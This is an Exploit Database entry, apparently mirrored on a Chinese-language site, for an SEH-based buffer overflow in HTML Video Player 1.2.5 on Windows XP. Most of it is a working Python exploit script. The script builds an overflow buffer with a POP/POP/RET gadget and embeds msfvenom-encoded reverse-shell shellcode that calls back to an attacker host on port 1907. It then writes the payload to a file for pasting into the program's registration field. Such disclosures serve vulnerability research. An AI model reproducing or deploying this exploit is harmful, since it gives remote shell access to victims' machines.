HTML Video Player 1.2.5 – Buffer-Overflow (SEH)

• Exploit Database
• 22 阅读

• 作者： Kağan Çapar
  日期： 2018-11-19
• 类别：

  • local
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/45888/

• # Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
  # Author: Kağan Çapar
  # Discovery Date: 2018-11-16
  # Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
  # Vendor Homepage : http://www.html5videoplayer.net
  # Tested Version: 1.2.5
  # Tested on OS: Windows XP SP3 *ENG
  # Steps to Reproduce: Run the python exploit script, it will create a new
  # file with the name "exploit.txt" and copy content to clipboard 
  # Open software, click Help > Register and paste "Username" click "OK"
  # Finally, Connect victim machine on port your localport "1907"
  
  #!/usr/bin/python
  import struct
  
  #SEH chain of main thread, item 0
  #Address=0012EAF4
  #SE handler=41414141
  #=> next_handler below!
  #SEH chain of main thread, item 0
  #Address=0012EAF4
  #SE handler=336F4332 => 
  
  #7C901931 5E POP ESI
  #7C901932 5B POP EBX
  #7C901933 C3 RETN
  
  #Executable modules, item 14
  #Base=7C900000
  #Size=000B2000 (729088.)
  #Entry=7C912AFC ntdll.<ModuleEntryPoint>
  #Name=ntdll(system)
  #File version=5.1.2600.6055 (xpsp_sp3_qfe.101
  #Path=C:\WINDOWS\system32\ntdll.dll
  
  file = open("exploit.txt", "w")
  buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124
  buf+= "\xEB\x06\x90\x90" #6b jmp code
  buf+= struct.pack('<I', 0x7C901931)
  
  # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
  #Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
  #x86/shikata_ga_nai succeeded with size 351 (iteration=0)
  #x86/shikata_ga_nai chosen with final size 351
  #Payload size: 351 bytes
  #Final size of py file: 1684 bytes
  
  buf += "\xbe\xab\xfd\x5f\x95\xda\xcb\xd9\x74\x24\xf4\x5f\x29"
  buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xf3\xbd"
  buf += "\x60\xde\xe4\xc0\x8b\x1e\xf5\xa4\x02\xfb\xc4\xe4\x71"
  buf += "\x88\x77\xd5\xf2\xdc\x7b\x9e\x57\xf4\x08\xd2\x7f\xfb"
  buf += "\xb9\x59\xa6\x32\x39\xf1\x9a\x55\xb9\x08\xcf\xb5\x80"
  buf += "\xc2\x02\xb4\xc5\x3f\xee\xe4\x9e\x34\x5d\x18\xaa\x01"
  buf += "\x5e\x93\xe0\x84\xe6\x40\xb0\xa7\xc7\xd7\xca\xf1\xc7"
  buf += "\xd6\x1f\x8a\x41\xc0\x7c\xb7\x18\x7b\xb6\x43\x9b\xad"
  buf += "\x86\xac\x30\x90\x26\x5f\x48\xd5\x81\x80\x3f\x2f\xf2"
  buf += "\x3d\x38\xf4\x88\x99\xcd\xee\x2b\x69\x75\xca\xca\xbe"
  buf += "\xe0\x99\xc1\x0b\x66\xc5\xc5\x8a\xab\x7e\xf1\x07\x4a"
  buf += "\x50\x73\x53\x69\x74\xdf\x07\x10\x2d\x85\xe6\x2d\x2d"
  buf += "\x66\x56\x88\x26\x8b\x83\xa1\x65\xc4\x60\x88\x95\x14"
  buf += "\xef\x9b\xe6\x26\xb0\x37\x60\x0b\x39\x9e\x77\x6c\x10"
  buf += "\x66\xe7\x93\x9b\x97\x2e\x50\xcf\xc7\x58\x71\x70\x8c"
  buf += "\x98\x7e\xa5\x03\xc8\xd0\x16\xe4\xb8\x90\xc6\x8c\xd2"
  buf += "\x1e\x38\xac\xdd\xf4\x51\x47\x24\x9f\x9d\x30\x26\x48"
  buf += "\x76\x43\x26\x71\xf5\xca\xc0\x17\xe9\x9a\x5b\x80\x90"
  buf += "\x86\x17\x31\x5c\x1d\x52\x71\xd6\x92\xa3\x3c\x1f\xde"
  buf += "\xb7\xa9\xef\x95\xe5\x7c\xef\x03\x81\xe3\x62\xc8\x51"
  buf += "\x6d\x9f\x47\x06\x3a\x51\x9e\xc2\xd6\xc8\x08\xf0\x2a"
  buf += "\x8c\x73\xb0\xf0\x6d\x7d\x39\x74\xc9\x59\x29\x40\xd2"
  buf += "\xe5\x1d\x1c\x85\xb3\xcb\xda\x7f\x72\xa5\xb4\x2c\xdc"
  buf += "\x21\x40\x1f\xdf\x37\x4d\x4a\xa9\xd7\xfc\x23\xec\xe8"
  buf += "\x31\xa4\xf8\x91\x2f\x54\x06\x48\xf4\x74\xe5\x58\x01"
  buf += "\x1d\xb0\x09\xa8\x40\x43\xe4\xef\x7c\xc0\x0c\x90\x7a"
  buf += "\xd8\x65\x95\xc7\x5e\x96\xe7\x58\x0b\x98\x54\x58\x1e"
  buf += "\x90" * (4000 - len(buf))
  
  print len(buf)
  file.write(buf)
  file.close()